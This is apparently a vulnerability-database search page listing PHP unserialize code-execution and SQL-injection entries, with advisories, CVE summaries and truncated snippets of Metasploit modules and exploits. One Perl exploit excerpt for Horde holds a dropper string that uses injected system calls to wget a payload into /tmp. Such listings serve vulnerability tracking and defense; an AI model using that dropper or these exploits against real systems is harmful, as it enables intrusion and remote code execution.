Lucene search
1318 matches found

seebug.org
added 2014/07/01 12:0 a.m., 46 views

Horde Framework Unserialize PHP Code Execution

No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...

7.5 CVSS, 0.3 AI score, 0.42895 EPSS
Exploits: 7

seebug.org
added 2014/07/01 12:0 a.m., 67 views

Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 17 views

Tiki Wiki <= 8.3 unserialize() PHP Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 22 views

PHP < 4.5.0 - unserialize Overflow

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 31 views

CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit

No description provided by source. $Id: cakephpcachecorruption.rb 11579 2011-01-14 16:25:37Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 21 views

PHP 3/4/5 Multiple Local And Remote Vulnerabilities (1)

No description provided by source. source: http://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: A heap-bas...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 49 views

Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution

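Tiki Wiki CMS Groupware 'unserialize' multiple remote PHP code execution vulnerabilities. Vulnerability type: design flaw. Cause: Tiki Wiki CMS Groupware versions before v6.9 and 9.3 contain a security vulnerability: certain scripts apply "unserialize" to user-controlled input, and an attacker can exploit this to inject and execute arbitrary PHP code in the affected application. Remediation: update to the latest version http://info.tiki.org/article210-Tiki-10-0-is-here ?php /...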

7.5 CVSS, 0.2 AI score, 0.62989 EPSS
Exploits: 12

seebug.org
added 2014/07/01 12:0 a.m., 37 views

PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)

No description provided by source...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 34 views

SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution

No description provided by source. ?php / ------------------------------------------------------- SugarCRM CE = 6.3.1 unserialize PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software...

0.2 AI score, 0.67256 EPSS
Exploits: 13

seebug.org
added 2014/07/01 12:0 a.m., 36 views

RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

No description provided by source. ?php printr' -------------------------------------------------------------------------- RunCms = 1.5.2 /class/debug/debugshow.php sql injection / credentials disclosure exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: Runcm...

7.1 AI score
Exploits: 0

Packet Storm
added 2014/06/29 12:0 a.m., 66 views

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

7.5 CVSS, 0.1 AI score, 0.42895 EPSS
Exploits: 7

Tenable Nessus
added 2014/06/27 12:0 a.m., 217 views

PHP 5.4.x < 5.4.30 Multiple Vulnerabilities

According to its banner, the version of PHP 5.4.x installed on the remote host is a version prior to 5.4.30. It is, therefore, affected by the following vulnerabilities : - Boundary checking errors exist related to the Fileinfo extension, Composite Document Format CDF handling and the functions...

7.5 CVSS, 7.7 AI score, 0.30128 EPSS
Exploits: 6, References: 26

Tenable Nessus
added 2014/06/19 12:0 a.m., 37 views

openSUSE Security Update : typo3-cms-4_5 (openSUSE-SU-2014:0813-1)

typo3-cms-45 was updated to version 4.5.34 to fix eight security vulnerabilities and several other bugs. These security problems were fixed : - Add trusted HTTPHOST configuration CVE-2014-3941 - XSS in old extension manager information function CVE-2014-3943 - XSS in new content element wizard...

6 CVSS, 5.5 AI score, 0.02662 EPSS
Exploits: 0, References: 7

Cvelist
added 2014/05/27 3:0 p.m., 36 views

CVE-2013-2225

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

7.6 AI score, 0.07563 EPSS
Exploits: 2, References: 6

CVE
added 2014/05/27 3:0 p.m., 62 views

CVE-2013-2225

CVE-2013-2225 affects GLPI: inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via _predefined_fields in front/ticket.form.php. OpenVAS/Mageia advisories confirm the issue and indicate a fix was released: upgrade to GLPI 0.83.91 (and patch...

6.4 CVSS, 7.4 AI score, 0.07563 EPSS
Exploits: 2, References: 6, Affected Software: 1

NVD
added 2014/05/27 2:55 p.m., 20 views

CVE-2013-2225

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

6.4 CVSS, 7.6 AI score, 0.07563 EPSS
Exploits: 2, References: 6

Prion
added 2014/05/27 2:55 p.m., 27 views

Code injection

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

6.4 CVSS, 7.2 AI score, 0.07563 EPSS
Exploits: 2, References: 6, Affected Software: 1

UbuntuCve
added 2014/05/27 2:55 p.m., 26 views

CVE-2013-2225

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

6.4 CVSS, 7.2 AI score, 0.07563 EPSS
Exploits: 2, References: 2

Typo3
added 2014/05/22 12:0 a.m., 179 views

Multiple Vulnerabilities in TYPO3 CMS

It has been discovered that TYPO3 CMS is vulnerable to Cross-Site Scripting, Insecure Unserialize, Improper Session Invalidation, Authentication Bypass, Information Disclosure and Host Spoofing. Component Type: TYPO3 CMS Vulnerability Types: Cross-Site Scripting, Insecure Unserialize, Improper...

6 CVSS, 6 AI score, 0.04465 EPSS
Exploits: 0, Affected Software: 1

Check Point Advisories
added 2014/05/18 12:0 a.m., 2 views

Horde Framework Unserialize PHP Code Execution (CVE-2014-1691)

An arbitrary PHP code execution vulnerability has been reported in Horde. An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the web server...

3.2 AI score, 0.42895 EPSS
Exploits: 7